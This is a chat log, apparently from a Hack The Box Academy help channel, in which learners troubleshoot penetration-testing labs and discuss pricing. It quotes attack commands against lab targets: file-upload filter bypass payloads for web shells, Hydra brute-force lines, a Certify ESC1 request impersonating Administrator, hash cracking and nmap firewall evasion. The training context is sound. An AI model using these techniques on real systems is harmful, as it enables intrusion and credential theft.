#modules

Always evaluate outputs when you get an incorrect answer. Likely an additional line that wasn't considered

HTB doesn't generally hold your hand, and will expect you to critically think to answer questions

Hey guys i am new here, I am interested to become cybersecurity specialist, I dropped out of university cuz of high costs, but i still want to continue with my career, I would take any advice, whether it is worth to take htb courses, I found it cost 400-500$ which is so much for me, perhaps is there cheaper alternative? let me know please, thanks.

you can do the plat monthly which is gonna be far cheaper; also you don't need to take the exam to have learned anything

There's also a student discount on the monthly plan, which brings it down to pocket-change-per-month if you happen to be in school (doesn't matter what level).

is any university (any country) eligible for that discount though?

or only specific ones?

From my understanding, all you need is an email address associated with an educational institution (in my case, Saddleback College — which is a community college, not even a university). Should work anywhere; since HTB HQ is outside the US anyway, I seriously doubt they'd geographically restrict it.

Actually, they restrict service to Russia.

That's because the US isn't in Russia.

Oh, sorry, got wording backwards

Thought by "restrict service to Russia" you meant "ONLY available in Russia" for a second — which is not true at all

taking this htb course will be enough to start some entry level job ? what else do i need to do, like how do i get into cybersecurity field job without university?

If you can talk to someone who knows what HTB is. Right now because it's one of the newer certifications out there it's not well recognized by HR, and HR is usually the gatekeeper to getting an interview. That said, it is definitely the best content out there for pentesting courses.

so if you can actually talk to someone who knows anything, they would understand the HTB certs are a lot more meaningful than something like OSCP

Anyhow, moving on: Reached File Upload Attacks § Whitelist Filters now, and encountered a snag. Burp Intruder is showing 4 results for file upload vectors, but they all have slashes in them — and "/.jpg" is just displaying plain text instead of giving me a web shell. Tried just copying and pasting the successful payloads into the paths verbatim and all I got were 404 and 403 errors. So, is there another solution to this? Should I be using ffuf instead of Burp Intruder or something?

404 means the file is not found, 403 means you don't have permissions to view it

Exactly, and that's happening with all 4 payloads that Burp Intruder is successfully uploading and returning the correct Content-Length in response to. So what gives?

sounds like you're not looking in the right spot if you're getting 404's

you have to find the right bypass method

They're showing up in Burp as File uploaded successfully but in Chrome as 404.

And just a slash followed by the extension is displaying the plaintext of the webshell instead of running it.

not sure what you mean by that, if you got a 404 navigating there then you're not looking at the web shell

These are the 4 Burp hits:

||```
shell.php/.jpg
shell.phps/.jpg
shell.php.\.jpg
shell.phps.\.jpg

Again, all 4 of them are 404ing in Chrome but succeeding in Burp. Why?

if you get 404 you're either not looking in the spot spot for the web shell or it didn't actually upload

yeah that's not the right bypass, so that won't work

What other wordlist would contain the right bypass?

so it sounds like it didn't actually upload

i'd just go through the section and try each method

Those don’t upload correctly with slashes

you would need to sniff the traffic to see. It's possible burp is sending the slashes URL encoded, but when you enter to your browser it might not be , or vice versa .

Specifically had URL encoding disabled for that section, but moved on from it anyway.

Curious though if using phpbash instead of the more basic webshell is a problem — I mean, it's been working up until this point.

i usually just do the super bare-bones php shell 😅

if the target can't use the shell_exec function, then php bash won't work

The Type Filters section is proving to be even more of a pain, since literally none of the wordlists are working, not extensions.lst and not even any of the SecLists on web extensions. Only things that Burp is returning OK on in the case of extensions.lst are null byte injections, which aren't doing anything when it comes to actually dropping a shell on the target.

Oops, it's even worse because they're having the opposite effect: everything before the \x00 is being stripped as opposed to after. Curious as to why that would be.

isnt that part more about changing content type and magic bytes

Percent-encoding the null byte instead of using it as is in the wordlist once again causes Extension not allowed to rear its ugly head.

Yes, but prepending GIF8 also isn't doing anything and neither is setting the MIME type to something different.

what about gif87a/89a

Still trips the extension filter, since there's both an extension filter and a MIME filter on this target.

Curious if there's a way to combine more than 1 wordlist with Burp Intruder, since you apparently need wordlists for both the MIME and the extension. There definitely is with ffuf, so perhaps that would be where to start fuzzing next.

Pro version lets you do that

use the wordlist mentioned in the section

Hi Nuts!

hey hey

And what about the extension, which is still being blocked despite the MIME type going through?

you don't need to go outside of this module at all for everything in it, focus on what's taught in the section and use those methods, maybe combine them, and you can get it

the extension is in the lists they put in previous sections

worked fine for me

Well I tried uploading it as ||shell.phar%00.jpg|| and was successful at getting a file upload — only for any attempt to access the destination file to 404 on me.

Not including the percent-encoded null byte, meanwhile, trips the extension filter.

it shouldnt trip the filter

try all the methods in the section

Anyone that has done the attacking common applications module can they tell me why this hydra command isn't working, its bruteforcing a joomla login. I think its the failure condition but I have tried various others and can't get it to work

hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt dev.inlanefreight.local http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&d7c94e1f28b3556bb3940ef03e6d9f55=1:F=Warning" -V

why are you using hydra

I got it using joomla-bruteforce tool but I just wanted to see if I could get it with hydra aswell out of curiosity

considering what's in the python script it's probably a lot more than a simple hydra brute

just a guess i didn't try

Found another payload that circumvents the filters but when I go to visit the page all I get is this ― no RCE. Why?

probably the payload

you say the payload works, but then says it doesn't

Simplifying it to just a PHP shell one-liner makes no difference.

so it's not working, so its the payload

Others have gotten phpbash to work with this filter circumvention before according to search results ― @fading oracle what am I doing wrong here?

no one can tell you because they have no idea what your payload is. simple fact is, if you can bypass the filters and successfully upload a file, then access that file, it's the payload that isn't working

it can't really be anything else

It's just a copy-paste of the phpbash payload with ||the JPEG file signature prepended|| so again, why would that not work?

again, if what you're saying is true, it's the payload

simple as that

there are 2 factors to take into account for this, 1) bypassing the filters and 2) having a working payload

if you've done 1, then it's 2.

there's literally nothing else it could possibly be.

Is Burp Repeater required or do I need to upload it the normal way to bypass this filter? Because for whatever reason, the upload bypasses filters the latter way but not the former way.

i used what was in the example

idk i just used burp like the section showed

didn't try anything after that

i'm not sure what you mean by "normal way" when bypassing fitlers, i'd think the normal way is burp

if you mean just straight uploading the file, your browser isn't going to modify the request like burp does to bypass the filters

don't overthink the modules too much, i found this module to be really straight forward. the payload shown in the section worked for me once i got the bypass going.

Yup it’s a lot simpler than it seems

You can do the normal way but will need to configure extra proxy settings to delete the front end filtering

Burp repeater bypasses that tho

Burp's hex editor is helping, at least when it comes to getting Burp to get the file signatures right. Still a pain to use though.

you're way over thinking it, what they taught in the section will do it. you don't need to hex edit anything.

Got it. Just needed to switch some extensions around. The problem is that copied and pasted file signature characters are encoded in Burp with the C3 prefix, so ÿ for example becomes C3 BF instead of the correct FF. This was causing problems when sending Burp requests, which have now been fixed.

You already bypassed the file signature part, why are you changing it

Again, because I bypassed it from Chrome while Burp was still causing problems.

you probably didn't actually bypass it

Dm a pic of the file

Too late, found out what the problem was and fixed it. Soon as I was able to bypass the filters from Burp instead of from my browser, was home free with this.

Sorry for putting you guys through all this trouble.

Can anyone provide me a hint for third question in skills assessment - Sliver. I can DM what I did so far.

Which module?

My bad. It's Sliver

Hi. Can anyone give me a hind about the Login Brute Forcing Skill assesment part1? i've already tried with the seclists and i just cant get through the basic auth login

The section mentions the required wordlists so you'll find your answer in them.

ok, i'll take another look then, thankss

I'm facing an issue with nc.

I am on the "Privilege Escalation" of Nibbles from Getting Started module. I had the reverse shell and ran the python3 script to upgrade TTY, I followed the process, but when I returned to the reverse shell using fg , I could no longer use the Enter CTRL + C or any combination keys. I could only type alphabets and numbers.

I closed the reverse shell terminal hitting the x using the mouse, and now I can't get nc to start again.

I have restarted the VM, terminated the victim machine, and had a new IP for the target, I changed the port nc should listen on, netstat -np | grep 9442 doesn't give me any result.

Any help will be appreciated.

yeah i was blind haha, thanks again

make it nc -lnvp 9443

like this you will start listening for connections (-l) and specify the port you are listenting on (-p).

Thanks

Do you have any idea what's causing the keys to stop from functioning? It has happened again!

in a reverse shell, some keys wont be working properly, arrows, tab auto complete and so, you need to stabalize it for it to work, it was mentioned the module, revise your notes/the module

I will go through the notes again, this time with my eyes open

Hi guys , for this module https://academy.hackthebox.com/module/57/section/3209, are we really expected to wait for the bruteforce to finish (completing all instructions the wordlist will still take 10000 minutes to complete...)

Just wondering if I am missing something that would make this module a little faster, I created the username list as per instructions using username-anarchy and password list with cupp just like the module

and filtered down the password list to match the PW policy, but it is still going to take a rediculous amount of time

If you followed the section text then it shouldn't take that long to get the valid creds.

its been 30 minutes so far

you might be doing something wrong then

doesn't look like I can share a screenshot but double checking it all it looks exactly the same , i literally copy pasted

Saving dictionary to jane.txt, counting 46790 words.
[+] Now load your pistolero with jane.txt and shoot! Good luck!

┌──(kali㉿kali)-[~/Documents/loginBruteForcing/username-anarchy]
└─$ grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&].){2,}' > jane-filtered.txt

┌──(kali㉿kali)-[~/Documents/loginBruteForcing/username-anarchy]
└─$ ./username-anarchy Jane Smith > jane_smith_usernames.txt

these seems to be correct

─(kali㉿kali)-[~/Documents/loginBruteForcing/username-anarchy]
└─$ hydra -L jane.txt -P jane-filtered.txt 94.237.61.216 -s 32570 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-16 02:40:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 371933710 login tries (l:46790/p:7949), ~23245857 tries per task
[DATA] attacking http-post-form://94.237.61.216:32570/:username=^USER^&password=^PASS^:Invalid credentials
[STATUS] 602.00 tries/min, 602 tries in 00:01h, 371933108 to do in 10297:10h, 16 active
[STATUS] 604.33 tries/min, 1813 tries in 00:03h, 371931897 to do in 10257:22h, 16 active
[STATUS] 604.71 tries/min, 4233 tries in 00:07h, 371929477 to do in 10250:50h, 16 active
[STATUS] 605.60 tries/min, 9084 tries in 00:15h, 371924626 to do in 10235:43h, 16 active
[STATUS] 606.97 tries/min, 18816 tries in 00:31h, 371914894 to do in 10212:23h, 16 active
[STATUS] 606.64 tries/min, 28512 tries in 00:47h, 371905198 to do in 10217:40h, 16 active

yeh sorry for the spam, cant send a screenshot but something seems off with this module

This seems correct as well from the looks of it. Try resetting the website and try again?

too easy will do

ffuf -u http://83.136.254.47:44449/ -H "HOST:FUZZ.inlanefreight.htb" -w /usr/share/dnsenum/dns.txt

I am using this command for one of the exercises. However the output shows hits on all the lines in the wordlist with status 200
In order to verify, I checked this on google.com, however it did not hit

Am I doing this the right way? Is it supposed to hit all the lines? As in the server is set up that way

You can use filter options like -fs, -fl which would filter your output based on lines or status code etc.

So the server is indeed set up that way?

\ \ ,\ \ ,/\ /\ \ \ \ ,\
\ \ _/ \ \ _/\ \ _\ \ \ \ _/
\ _\ \ _\ \ _/ \ _\
// // /_/ //

   v2.1.0-dev

:: Method : GET
:: URL : http://83.136.254.47:44449
:: Wordlist : FUZZ: /home/kali/word
:: Header : Host: FUZZ.inlanefreight.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500

dhjkshd [Status: 200, Size: 116, Words: 4, Lines: 2, Duration: 119ms]
hsdi [Status: 200, Size: 116, Words: 4, Lines: 2, Duration: 122ms]
shdkjhs [Status: 200, Size: 116, Words: 4, Lines: 2, Duration: 125ms]
[Status: 200, Size: 116, Words: 4, Lines: 2, Duration: 132ms]

iirc it would behave the same way for other websites as well, you need to manually specify in order to filter the results.

Here you can filter based on lines like -fl 2 or words -fw 4

What am I filtering for here? Like unusual amounts?

More the the same sadly, do you think you could give it a go and let me know if it works for you?

yes

okay

Thank you

Yess, thanks. will let you know

I got the results in less than 10 seconds

interesting ill do the whole thing again i guess

you used jane_smith_usernames.txt as the name of wordlist but here you're using jane.txt are both of these same?

That was it, thank you so much , too late for me here

no worries

have anyone uploaded a file to the webroot of the server in TNS section with odat

index.html is not present in the directory

read the error

Hi, I am new to cyber security, I know the basics about networkings, computer architecture and stuff.

Objective

• My objective is to start learning cyber security passively, so that I can improve my understandings about computer systems. And if possible earn some passive money through bug bounty and CTFs.

Some Context

• I have be exploring cyber security on and off since the start of my college. Recently I read "The Art of Exploitation" and then started with "CREST CCT INF Preparation" Skill Path as covered topics looked interesting.

Question

• So will this path help me achieve it?

I did but apparently not properly because now i am connected. Found the flag, thanks.

its present in the same dir

is it possible to access pwnbox via vnc externally?

it was the problem of odat i downloaded latest version and it worked there file upload but no code execution its iis server so asp.net will execute but there is no execution

Doing the 'Attacking DNS'. I'm trying to do a zone transfer, but it's failing. I have resetted the box. I have first enumerated the name server. I have edited my hosts file. No, I am not using subbrute (since it was integrated in sublist3r in Kali, according to documentation, and I have used sublis3r instead), I have also used dnsrecon. I cannot solve this. It's frustrating. What am I missing?
Edit: Now I have also used subbrute, but I'm not any whiser. Would appreciate some advice.

Hey @everyone I’m a beginner wanting to get into hacking and cybersecurity where should I start ? And where’s a good place to gain knowledge and learn

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Attacking Common Applications - osTicket section.
"Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson ."

I made a ticket, found the email and registered it. Yet when I try to fuzz for other vhosts I find nothing. My point being: I have to set up a verification email, so I can verify the registered email and access osTicket. I also found above in the chats that I have to pay for the Dehashed service so I can find these credentials. I suppose that I have to pay to use dehashed -> find creds -> verify the registered email -> access it and complete the section.

Any tips on what I can do? Ty in advance.

Just login with the credentials the example used

Maybe try subbrute?

yeah, doing that but not whiser...

Did you use the target as the only nameserver?

Yes, I first ran dig any to get the name server, then used that one and only name server in the resolvers.txt

Just put the ip there, dig isn’t needed first

not following, put the IP where?

The resolvers file

just the IP and not the name server??

The ip is the nameserver

ok, because it runs dns on 53?

No way it's that easy bruh, lemme try

Not really because of the port but It’s gonna try to translate any domain names you give it regardless

I'm sorry but this part of the corse just gets me confused. Thought I had an ok idea about dns, but now it's just spinning

So the task is to: Find all available DNS records for the "inlanefreight.htb" domain on the target name server ..." and that would translate into 'bruteforce all subdomains for inlanefreight.htb'?

Yes

You can also use a 3rd party service

Just like how you used dig by using the ip address, you don’t need the name servers domain name for it to do it’s job

dnsdumpster from the machine that uses the VPN, although I woudln't recommend it as bruteforce means to use gobuster/ffuf, dirbuster or wfuzz to find the subdomains.

if im doing a vulnerability assessment report do i put the nessus scan on the same report or like do i send it to them individually ?

Ok, thanks, I'll give it a go ---> thanks, finally tied the pieces together

None of them work.

Lemme try logging w/ email and pwd instead of user

Nvm it worked with email and pwd, wtf

my gold annual subscription will end soon. so what will happen to the modules i owned 100% for example all the cpts modules ?

You keep them

Hey, I was confused in Network Enumeration with NMAP/ Firewall and IDS/IPS Evasion - Medium Lab. I tried to get the ||version of the DNS server|| by changing the ||dns-server to scan the target|| but initially for few tries with different scans it was shown that the port is filtered but after few tries it was displaying the version. So i just used the same command that got me the version in the target previously after restarting the target but now it did not worked and showing the port is filtered. I don't know why this is occurring so if anyone could explain me to understand this then it really can help my learning process. Thank you.

I think changing the source port would be a good idea?

Tried but initially for few tries it was showing filtered even though i used the same command that got me the version last time after restarting the target.

Try using -sU and changing the source port to 53 so the target thinks you're also a DNS server — that's what I did.

let me try and say the result. Thank you!

Thank you it worked, I forgot that the dns uses udp by default. But the one thing that confusing me is, how it is working after a few tries of only TCP scans with the different dns server? I mean I can understand why we are changing the dns-server but why after few tries of TCP scans only it is working but not in the first try of tcp scan even though we used the same tcp scan that got the version last time(after restarting the target)?

Hello seniors i want your help !! . { What is the index number of the "sudoers" file in the "/etc" directory? } to solve this question i enter " ls -l -i | grep sudoers " thi script and in the result i get this "1851558" . but when i write in the the answer section the system said i enter the wrong answer . how and why ?

Because firewalls can filter by protocol too, not just port number. So while the medium lab left TCP-53 available as an option, the hard lab didn't.

Why not just ls /etc/sudoers

i did not knew about this before , thank you

why i can't paste in the pwnbox ?

this happens sometimes click the little button in the lower right corner with the clip board, it opens a web clip board that you should be able to use as a go between

Hi everybody, i got a problem with the Information Gathering - Web Edition, in the DNS Zone Transfer Module, im triying to perform the questions but i think there's something wrong, if anyone could give a hand pleeaaseeee

have you done the footprinting module?

Forget it i was doing the worng comannd

Thx anyways!

Does anyone know if it's a problem to overwrite the $USER environmental variable; is there anything its actually used for?

Hi anyone done wifi pentesting module if yes , I am stuck in second question of "Airdecap-ng" section . Where it asks password for an answer I think I have found half password but it's not correct can anyone help me?

Follow the tcp stream in wireshark

Hmm thanks 👍

I thought to do it but , I felt it would not work, HackTheBox modules requires more thinking 🙃

for shadow credattack
i am able to create cert

but using rubeus with the cert give following errors

which module please ?

I think he is doing the outdated machine, beucase of the bloodhound behind the terminal output

Know the fundamentals well. I suggest linux fundamentals course via HTB academy. The academy is where you can build your skillset and choose a job path that you're interested in. Get certified.

Yes he is

Looks like problems in your Rubeus

I think he need to asks in #boxes

Hiii

Yo

I'm really struggling to get this hash cracked in https://academy.hackthebox.com/module/147/section/1319 (Passwd, Shadow & Opasswd)

Here's where I'm at, having got the ||passwd & shadow .bak files
hashcat -m 1800 -a 0 unshadowed.hashes Password-Attacks/mut.list -o cracked.txt -r Password-Attacks/custom.rule||

I've been going about 45 mins with this. Am I on the right lines or is there no need for the ||rule file?||

The list is already mutated, no need for more rules

Feck 🤦‍♂️

Thanks for point this out!

Hii everyone, which subscription allows me to access Active Directory Penetration Tester for one month?

Gold annual

Oh nvm you said a month, I don’t think that’s possible

can I access it with any monthly subscription?

thanks

I don’t think so

Will have to unlock the modules as you go

thanks for the info guys

I love when I'm on the very last step of typing the flag in these AD penetration tester path modules and the lab resets :)

had anyone problem in module Windows Attacks and defense? section - PKI ESC1
if anyone can help let me know , thanks

had an unexpected error ....

I RDP'd into the kali machine and from there RDP's into the WS001 machine.
Trying to replicate the attack scenario but facing an error when executing this command: .\Certify.exe request /ca:PKI.eagle.local\eagle-PKI-CA /template:UserCert /altname:Administrator
The error is [X] Error sending the certificate request: System.Runtime.InteropServices.COMException (0x800706BA): CCertRequest::Submit: The RPC server is unavailable. 0x800706ba (WIN32: 1722 RPC_S_SERVER_UNAVAILABLE)
I checked services.msc and RPC service is running

Any help on this would be much appreciated

Server-side attack - blind SSRF - Exploit the SSRF to identify open ports on the system. Which port is open in addition to port 80?

Is purpose of this question just waste of time or am I missing something obvious here? I really don't want to waste a night on scanning open ports...please help 🆘

trying putting this at the ca option, /ca:eagle-PKI-CA

I don't remember if I just restarted the machine for this section or I used certipy

Guyss I found it why!

It was about port forwarding, just to save your time for other who struggling with the same

how did you solve this problem please help?

use the other technique rather than trying to stack commands with <<< the way you would use | in bash. <<< seems to only be usable once

(note how the strings you're grep'in for don't exist in the final output)

This will not worked. In case you still have problems remember what are other "particular" properties that network has.

Hi, not sure where to put this question so sorry if it's a bit rogue for sub: I've finished most of the pre-reqs then started jumping around between modules and decided to look at network analysis instead of following CDSA completely. This came up in one of the tcpdump sections:

Hunting for SYN
tcpdump -i eth0 'tcp[13] &2 != 0'

which presumed you'd understand that tcp[13] & 2 is saying check for 13th byte and count the 2nd bit is on, how can I learn about this stuff, preferably in relation to network analysis - it's clearly lower level stuff than I'm used to, I understand memory etc. but not in this context, would like to learn more about it and not sure if it's just because I've skipped through things.

tldr. How do I learn about computer memory in relation to network analysis to do cool things with tcpdump - is it available in modules or does anyone have any resources to go off of?

Id look more into how tcpdump works so you know how to ask the right questions

Hello im stuck on footprinting hard lab, could you guys give me some tips or push me in the right direction?

Yeah good shout, I only asked in this sense bc I've finished the tcpdump section and nothing has really gone over what happened there so was curious if I'd just skipped over something important in previous modules to do with packets in memory or not - but will look into their whitepapers thx

https://danielmiessler.com/p/tcpdump/

legend, ty

https://serverfault.com/questions/922988/tcpdump-tcp-header-offset-13

I searched "'tcp[13]' traffic analysis"

Literally that simple

ey

jo

Having a struggle with Task 3 "Determine the registry key used for persistence and enter it as your answer." of "Introduction to Digital Forensics" @ (https://academy.hackthebox.com/module/237/section/2614).

I believe I've found the key but am also experiencing the issue of formatting when trying to submit my answer. Any assistance would be dope :3

the hive name in the answer is either abbreviated or full name, don't remember which

Hmm ok thankyou ill try shifting it around again....maybe there's another registry based persistence method being used as well 0.0 that i missed somehow? but i feel certain this is the correct executable (r*v****.exe).

the hive name is the full name

thankyou 🙂

I’m thinking of joining the military soon, do u think this would hinder me from learning an building up my skillset ? My job if I join will be IT specialist which is basically help desk and a lil bit of network engineering

Bit off topic for modules, but If you're talking US, then once you get past initial training you do have free time and a life (most of the time). Using Tuition Assist ymmv depending on the unit and location.

Having IT in your background def won't hurt you, and some of the MOSes you'll actually get pushed to take/pass basic certs (usually CompTIA or CCNA kind of stuff).

Module: Linux privilege escalation
Section: Environment Enumeration
hey I am having trouble putting the flag in the input. has anyone else had the problem

Whitespaces?

no where you have to answer the question

I am having a hell of a time with the Limited File Uploads module. Every time I upload a svg file to capture a request in zap the site crashes. I have tried like 10 times now. Should be a simple exercise

Is anyone else having this issue? I have tried several svg files as well

my grammar is bad

Did you restart the machine?

Is it zap or the machine?

I have restarted both several several times. even uploading outside of zap just in broswer does the same

Hello everyone, I need a tip on the nmap enumeration module, in the Firewall and IDS/IPS Evasion part - Medium Lab
After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.

What have you tried?

worked fine on burp

I’ll try burp tomorrow I spent enough time on it tonight. Really wanted to become a full on ZAP guy lol

you know what a 404 is.. it's because the file is not found at that location

that's literally all there is to a 404

Been there but Burp is better

Btw wait until u discover that burp has external plugins which are features u can add

ZAP does too 😉

..but Burp certainly more widely used

Hello! is anyone on?

try asking in #starting-point

Just added an #1234357888114364508 post about the issues I was having with the Upload Attacks SA: #1296302105333596194

Yes, it turns out the problem was the time zone in which the target was operating. Might want to mention that in the module so others don't get confused by it.

i viewed it more as 'knowing your target'

like on a real pentest you may not be provided that info

just keep in mind htb is a euro company

i don't think what you're saying is invalid or anything though

True, but unless you have dual citizenship or happen to live in an overseas territory of the country in which your client is headquartered it's unlikely you'd be conducting real pentests from half a world away. Plus, knowing the location of the target makes the time zone easy to guess.

Does anyone have a moment to discuss some assembly?

I'm having some trouble with module 89, the assembly skills assessment.

if this is the wrong place to ask, let me know

you should also look at the pcap file in wireshark, count the bytes, arrive at the same packet/data

im doing something similar with the next step in where you're at, which would be traffic rule analysis from ids/ips

you mioght want to check #programming this is primarily for academy modules on the platform

hey exciton! i had a question about a module about assembly

oh i see, you should include a link to the section and your question then, someone whos done the module should be around "soon" to help

Thank you, I'll keep that in mind. In the meantime, I decided the re-read the forums and managed to find the answer to my question.

Hi @acoustic owl just one small update and for healthy discussion, we have discussed that price is very much for India. For oscp it is very unfair for Indians so we discussed it in #modules message

You have reasoning that cost is adjusted to American living style, wages, inflation, CTC, .. .. yes you are right but it is heavy money for Indian as here wages are low ... But india have one advantage of learning population So company can earn more money offering less price to Indian population. So it is good for both side.

So that same philosophy now THM maybe adopting now, just a day before THM reduces its Monthly Premium Membership for Indians to 14$(1170Rs) to 6$(499). And I am sure both side will get benifit from this generosity by THM. I hope HTB, OSCP also see into it and follow THM strategy.

There is a student subscription that costs around $8 and provides access to modules up to tier 2 including

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions#h_d0354c1221

I am not student(it could had been there when I was student) and I am talking about silver annual plan(1 exam), atleast that rates has to adjusted... And pricing is more about to OSCP than HTB, just that if HTB reduces little to Indian learners it could be great. Yeah I really like the generous pricing to students, kudos to HTB but it is not useful to most of us.

And Can you please tell me why can't message in "general" or other sections? How can I send message there...

Well, read the rules and the welcome channels

Additionally, in the comment above, in the past, people have provided insights into which option could be cheaper for people. You can search it up in the history of this or other channels

Yes best is 490$, common sense but didn't saw other options in discord here..

My calculations: there is some straight path shortcut there like for
cpts:
Option 1.
68$ multiply 2 months = 136$+210$ certification exam = 346$, which is not worth and only two months study material.

Option 2:
$18 multiply 10 = 180$ + 210 certification exam = 390$ , time consuming and pricey but 10 month study material.

So only best option remains 490$ only. Just I am calculating. They calculated and setup perfectly, it is well suited for Western world and pricing, but not for other sides of world. That is point which I am making. Just my opinion nothing else.

modules unlocked with cubes are unlocked permanently

Are you asking questions? Or giving answer and validation? Yes modules unlocked permanently but don't know in case say cpts is 1940 cubes and to complete it do I need to enroll with full 1940 cubes? or it also counts individual cubes in that enroll.. if say I completed 500 cubes modules from that cpts course without enrolling, then cost of cpts cube reduces to 1940-500=1440 cubes.. don't know it...

68$ multiply 2 months = 136$+210$ certification exam = 346$, which is not worth and only two months study material.
modules unlocked with cubes are unlocked permanently, not just two months

Yes got it that is why 1000*2 = 2000 cubes and cpts 1940 cubes ..

I understand your point, but as I said before, the costs are the same no matter where the student is from.
If you have to supervise an exam for 24 hours, that's 3 shifts. So three employees who want to get paid. These costs in turn have to be paid by the student.
And yes, the costs are certainly very high for certain countries. I am aware of that.

Hey guys, I'm on the module Tapping into ETW and I have to run "Seatbelt" while runnig SilkETW scan. ETW doesn't allow me to run any commands though, does anyone know how to bypass it?

Yeah ok...

Module Web Attacks, Bypassing Basic Authentication
there is this command to check which methods are allowed and there is in the module written this exmaple:
DMSPA@htb[/htb]$ curl -i -X OPTIONS http://SERVER_IP:PORT/

HTTP/1.1 200 OK
Date:
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory

but when i do the curl, i dont get the allowed methods, anybody know why?
$ curl -i -X OPTIONS http://83.136.254.37:44021/
HTTP/1.1 200 OK
Date: Thu, 17 Oct 2024 09:08:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1075
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

Try running in another PowerShell window

Hey, @autumn pilot
sorry to tag. Can I DM about the SCCM, MSSQL and Exchange module? I’ve completed it but the ending felt too easy, don’t know if I got an unintended path or something

I have a question regarding "Introduction to NoSQL Injection", "Skill Assessment 2", in the walkthrough it states that we need "..oracle, most importantly, bypassing checking of the password..". Am I missing something because I did not do that? I passed it without any !=

sure

/recursive_fuzz/level1/level2/level3/index.html does not show flag as what is described in the web fuzz recursive section , tried different instances and use the following command 'ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -u http://83.136.254.47:48849/FUZZ -e .html -c -t 100 -v -recursion'

Hello

Hi

Please read #welcome and #rules it will explain how to get verified

Can I dm you?

What for?

But sure

In ur dm pls

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Check link above

The module section doesn't necessarily reflect the lab, most of the time you need to applay the concepts and find your way in.

oke

I didnt get options on that when i did that module as well a few months back, go to a simple site and check it there and just know that it "works"

if you need the options for an exercise, then try ading -vv to curl (i think its -vv, -v or -vv, either should work)

Hello

moin, see #welcome to get full access to the server

Hello everyone help pls

windows priv escalation:skills assesment 1

Find the password for the ldapadmin account somewhere on the system.

I tried 2 days

What did u try

PowerSploit.psm1, Lazagne, Rubeus.exe Sherlock.ps1 RoguePotato.exe JuicyPotato.exe mimikatz.exe PrintSpoofer.exe

: )

Also msfconsole - smb deliver

Go through the module and redo the exercises

Why ?

Hi all! I'm going through the Footprinting module, and I'm having trouble with the last question of the DNS section, I think I'm missing something. After trying different things including dnsenum as specified at the end of the section, I was stuck and checked the hint. But I've been trying the different lists without luck, and it doesn't feel like a great lesson if I just need to find the right list, especially considering that it is quite time-consuming even if it runs in the background. So my guess is I'm missing something more fundamental. Any other hints you can give me?

If u are just here to complete the module then go ahead and wait for someone to hold ur hand.

But if u are here to learn, then redo the module, and seek external resources too

I used all methods in the module for finding credentials

for example: Cred Hunting....

On another external resourse said They did with JuicyPotato ,Lazagne

But not worked

can you link to the section? someone here was mentioning this just a few days ago and said the exact same cmd with pwnbox yielded instant, correct, reuslts.

Here you go: https://academy.hackthebox.com/module/112/section/1069
Yep, I found that in the discord search, even if it was for another module I got excited. But I'm not getting different results in pwnbox sadly.

Bro just give me some hint

(assuming I found the same thing you mentioned)

ok i dont have access to that one, are you saying pwnbox worked?

it hasn't worked so far, same results that I'm getting on my VM

hang loose someone should be around that can better help

thank you for trying 🙂 I appreciate it

Hi, I'm trying to use ReconSpider to discover the location where future reports will be stored on inlanefreight.com in the pentester job path (web information gathering module), but I keep getting what appears to be a mix of both output and stderr. Can anyone please walk me through this?

Nevermind, I figured it out - I needed to use a URL and not the domain for those wondering.

anyone ever faced issues with ligolo when trying to connect to MySQL ports ?

Why do u have to connect to MySQL port?

well there can be many resons, for that; checking for default creds, brute forcing password spraying, checking for credential reuse lol

Oh sorry I just understood the question

Well actually Ligolo it functions on a less-access network layer

This means that a lot of communication that u get on the real network u cannot get on the ligolo interface

Perhaps the mysql or the communication to that server it requires a higher layer

Other things for example sniffing with responder it requires higher layer as well

(if u ssh u get the same layer as the computer)

ok, got it thanks to @fathom pendant 's tips about a month ago (I'll link to that in the next message). I'll go through the section again because I definitely don't feel like I understood this very well, and that's a new feeling so far in the course. If you guys have any suggestions of other materials on this topic, I'd appreciate it!

^ the original question that got the hints

Hello, working on Pivoting, Tunneling, and Port Forwarding > Skills Assessment, 6th question : For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.
I have usernames mlefay and ||vfrank|| with their respective passwords. I am able to connect via rdp to the windows server ||172.16.5.35|| with both credentials. I see that this windows server is connected to another network in 12.16.6.x which I enumerated with a ping sweep. I found the ips 172.16.6.35 (which is the ip of the windows server on that other network) and ||172.16.6.45|| which is interesting, but I can't manage to connect to it via rdp from the windows server with either credentials. I am trying to figure out a way to nmap this ip, find an open port and netsh it but I can't manage it. Any hint would be much appreciated ! 🙂

make sure you check ipconfig so you're not trying to RDP into your own machine ;)'

Yes, the machine that I've rdped into using mlefay's credentials has an ip ending in 35 in both networks if I understand correctly, so I'm not trying to rdp into an address ending in 35.

👍

cool, but whenever I try to connect to the ||45|| one which I discovered to be up during the ping scan, it gives me an error message with both credentials, I'm assuming the best way to find out what's open on that computer is to run an nmap scan and therefore do dynamic port forwarding on the windows server, but I don't see what tool to use to do that, any hint?

